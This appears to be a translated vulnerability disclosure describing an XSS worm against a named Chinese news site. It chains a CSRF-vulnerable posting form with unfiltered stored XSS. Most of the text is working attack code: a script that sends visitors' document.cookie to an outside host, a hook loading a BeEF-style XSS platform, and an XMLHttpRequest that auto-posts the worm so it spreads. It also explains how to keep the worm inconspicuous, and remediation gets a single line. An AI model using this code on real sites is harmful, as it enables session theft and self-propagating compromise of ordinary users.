Caijing website XSS Worm

Source: Internet
Author: User


Worm = XSS + CSRF
 

Address: http://tnew.caijing.com.cn/


First, posting an article: the form submits four parameters directly with no token verification, resulting in a CSRF vulnerability.
 


 





Next, the stored XSS: the post content is not filtered, resulting in XSS.
 


 







Next, the worm itself:

------------------------------

If you insert <script src='http://wooyun.org/test.js'></script> into a post:



The content of test.js is:

    // Load the automatic-posting JS that spreads the worm
    document.write('<script src="http://wooyun.org/fatie.php?cookie=' + document.cookie + '"><\/script>');
    // Load the JS file of an XSS receiving platform, such as BeEF
    document.write('<script src="http://wooyun.org/xss.js"><\/script>');





In this way, the page loads both the automatic-posting JS and the XSS platform's JS.



When a user views the page, it loads: http://wooyun.org/fatie.php?cookie=(cookie content)



The content of fatie.php is roughly as follows.

The site's cookie carries the user name in cmstop_username. fatie.php takes the user name from the transmitted cookie and checks the database for whether this user has already run the worm. If it is the first time, the user name is written to the database so that the same user does not post repeatedly, and the script returns JS that performs the automatic posting. The returned JS code is roughly as follows:

    // The article title and content can be collected and stored in a database with PHP,
    // so that each infected user sends a different article to infect others
    var title = "url-encoded title";
    var content = "url-encoded article content containing the XSS code";
    var objXMLHTTP;
    if (window.XMLHttpRequest) {
        objXMLHTTP = new XMLHttpRequest();
    } else {
        var MSXML = new Array('msxml2.XMLHTTP.5.0', 'msxml2.XMLHTTP.4.0', 'msxml2.XMLHTTP.3.0', 'msxml2.XMLHTTP', 'Microsoft.XMLHTTP');
        for (var n = 0; n < MSXML.length; n++) {
            try { objXMLHTTP = new ActiveXObject(MSXML[n]); break; } catch (e) {}
        }
    }
    objXMLHTTP.open("POST", "http://tnew.caijing.com.cn/Articles/add", false);
    objXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    objXMLHTTP.setRequestHeader("Connection", "Keep-Alive");
    objXMLHTTP.send("title=" + title + "&content=" + content + "&g_name=%E5%90%E6%A7%BD&g_id=4&cate_id=23&cate_name=%E6%97%A0%E4%B8%BB%E9%A2%98");

In this way the XSS spreads. Each infected user sends only one post, which keeps the worm inconspicuous.





As for xss.js, it simply loads the XSS platform's script.

Solution:

Enhanced Filtering